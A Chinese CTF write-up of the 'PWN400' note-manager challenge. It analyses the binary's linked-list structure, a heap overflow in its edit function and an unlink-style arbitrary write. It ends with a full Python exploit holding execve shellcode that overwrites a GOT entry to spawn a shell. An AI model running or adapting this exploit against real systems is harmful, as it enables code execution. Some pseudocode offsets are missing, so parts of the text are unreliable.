之前没有分析PWN400,现在再开一篇文章分析一下。
这个日志是我做题的一个笔记,就是说我做一步题就记录一下是实时的。所以说可能会有错误之类的。
首先程序是经典的笔记本程序,基本上一看到这种笔记本就知道是考堆了吧~
write(, "1.New note\n", 0xBu);
write(, "2.Show notes list\n", 0x12u);
write(, "3.Show note\n", 0xCu);
write(, "4.Edit note\n", 0xCu);
write(, "5.Delete note\n", 0xEu);
write(, "6.Quit\n", 7u);
write(, "option--->> ", 0xCu);
功能选单也是很经典。。。。
那我们也按照套路来看看,首先是看下new note功能,看下note是怎么创建的,以及数据的存放位置。
//IDA 伪代码
int __cdecl sub_804897E(int a1)
{
void *v2; // [sp+1Ch] [bp-Ch]@1 v2 = malloc(364u);
write(, "\nnote title:", 0xCu);
read(, (char *)v2 + , 63u);
write(, "note type:", 0xAu);
read(, (char *)v2 + , 31u);
write(, "note content:", 0xDu);
read(, (char *)v2 + , 0xFFu);
*(_DWORD *)v2 = v2;
write(, "\n\n", 2u);
if ( *(_DWORD *)a1 )
{
*((_DWORD *)v2 + ) = *(_DWORD *)a1;
*(_DWORD *)(*(_DWORD *)a1 + ) = v2;
*((_DWORD *)v2 + ) = ;
*(_DWORD *)a1 = v2;
}
else
{
*(_DWORD *)a1 = v2;
*((_DWORD *)v2 + ) = ;
*((_DWORD *)v2 + ) = ;
}
return ;
}
可以看到这个是一定的结构来组织的,从这里估计这是一个模仿堆机制的漏洞,而不是真正的堆漏洞。
因为如果是堆漏洞的话,就没有必要搞这么麻烦的结构了,直接用堆自己的结构就可以了,当然这只是一个猜测,我也不知道到底是什么漏洞。
看了一下结构是这样的
struct note
{
DWORD 本块的指针;
DWORD 后一块的指针;
DWORD 前一块的指针;
byte title[];
byte type[];
byte content[]; }
可见是一个双向链表的存在。
注意这里,IDA F5出来的伪代码是错误的
*(_DWORD *)(*(_DWORD *)a1 + 4) = v2;
*((_DWORD *)v2 + 1) = 0;
这里明显是有逻辑问题的,看了一下汇编果然是插件的问题,汇编如下。
arg_0是函数的参数,也就是伪代码里的a1
var_c是分配的堆的指针,也就是伪代码里的v2
我们再来看看edit功能,因为edit功能往往是漏洞多发的地方。尤其是ZCTF给我留下了这个阴影。。都是edit功能出的问题,而show和delete功能只是作为触发条件的。
来看下edit功能:
有一个相当明显的堆溢出,看来我们是真的找对地方了。问题就是出在edit功能中。
再来看看其他部分吧,因为这么多的功能肯定是有用的,要不也没必要搞这么复杂了。
首先考虑的是leak的问题,因为首先我们分配的堆的地址是不确定的,要是想往堆里写点东西干点什么的话,肯定是要leak堆地址的。
如果不用堆地址的话,那么我们可能需要去改got表,因为堆溢出的本质就是任意地址写,肯定要leak出某个函数的真实地址。
我现在是在没有进一步分析程序的情况下做出的猜测。
说一下想法,因为目前没找到其他的漏洞。所以玩法应该就是利用堆溢出构造伪堆块,然后用空堆块合并机制实现unlink操作,进行任意地址写。写的目标应该是某个要调用函数的got表,
把它的内容改成system函数的虚拟地址或者是某个可以执行shellcode的地址。但是在此之前还是要leak内存,就是像上一段说的那样,必须要进行leak才行。
leak内存的想法就是找show功能选项。而要达到触发unlink宏还需要一个条件就是一个可控的free()。
后来想了一下,发现自己的整体想法都是有问题的。这道题考的根本就不是堆漏洞,而是用双向链表模拟堆。我一直都把它当成堆漏洞来搞是完全错误的,比如我的想法是伪造堆块诱发合并触发unlink,
这个思路对于这道题是完全错误的。因为这个题有它自己的链表机制如果去伪造堆块的话,会破坏它的链表是堆无法正常释放。
那么正确的思路应该是利用那个双向链表,实现一个类似于DWORD SHOOT的利用,我们看一下delete函数是不是这样的。
果然如此,经典的dword shoot写法,
前块的后向指针=当前的后向指针
后块的前向指针=当前的前向指针
再看下链表遍历机制, *(_DWORD *)a1 = *(_DWORD *)(*(_DWORD *)a1 + 8);它是这样去遍历双向链表的,所以覆盖头不会出现问题。
此外就是它的地址问题了,怎么样得到system的地址。我看了一下其他功能没有发现其他漏洞,那么很有可能是没办法得到system的地址的。我们再来看一下保护
蛤蛤,没有开nx,这个题啊,一颗赛艇。说明我们可以到处去写shellcode了。
而show功能又可以leak出块的地址,这样的话就没有任何问题了。正常的利用堆溢出去构造unlink造成dword shoot,造成任意地址写。把[email protected]改成我们在堆中的shellcode的地址。而shellcode的地址怎么获取呢?通过show功能就可以看到了,到这里整个的思路就很清晰了
from zio import *
import re shellcode = ""
shellcode += "\x68\x2F\x73\x68\xFF\x68\x2F\x62\x69\x6E\x8D\x1C\x24\x31\xC0\x88\x43\x07\x50\x53\x89\xE1\x8D\x51\x04\x83\xC0\x0B\xCD\x80\x31\xC0\x40\x31\xDB\xCD\x80" length=len(shellcode) io=zio('./pwn400',timeout = 99999) io.read_until('--->>')#create a
io.writeline('')
io.read_until('title:')
io.writeline('a')
io.read_until('type:')
io.writeline('a')
io.read_until('content:')
io.writeline('a') io.read_until('--->>')#create b
io.writeline('')
io.read_until('title:')
io.writeline('b')
io.read_until('type:')
io.writeline('b')
io.read_until('content:')
io.writeline('b') io.read_until('--->>')#create c
io.writeline('')
io.read_until('title:')
io.writeline('c')
io.read_until('type:')
io.writeline('c')
io.read_until('content:')
io.writeline('c') io.read_until('--->>')#show note b
io.writeline('')
io.read_until('title:')
io.writeline('b')
data=io.read_until('type:')
note1_add = re.compile("0x(\w+)")
result = note1_add.findall(data)
note1 = int(result[0],16)
print 'dbg address of b'+hex(note1) io.read_until('--->>')#edit note a
io.writeline('')
io.read_until('title:')
io.writeline('a')
io.read_until('content:')
sc1=shellcode+'a'*(260-length)+l32(note1)+l32(0x804A450-0x8)+l32(note1-260)
#io.gdb_hint()
io.writeline(sc1)
#io.gdb_hint() io.read_until('--->>')#delete note b
io.writeline('')
io.read_until('location:')
io.gdb_hint()
end=hex(note1).lstrip("0x")
#print end
io.writeline(end)
io.gdb_hint() io.interact()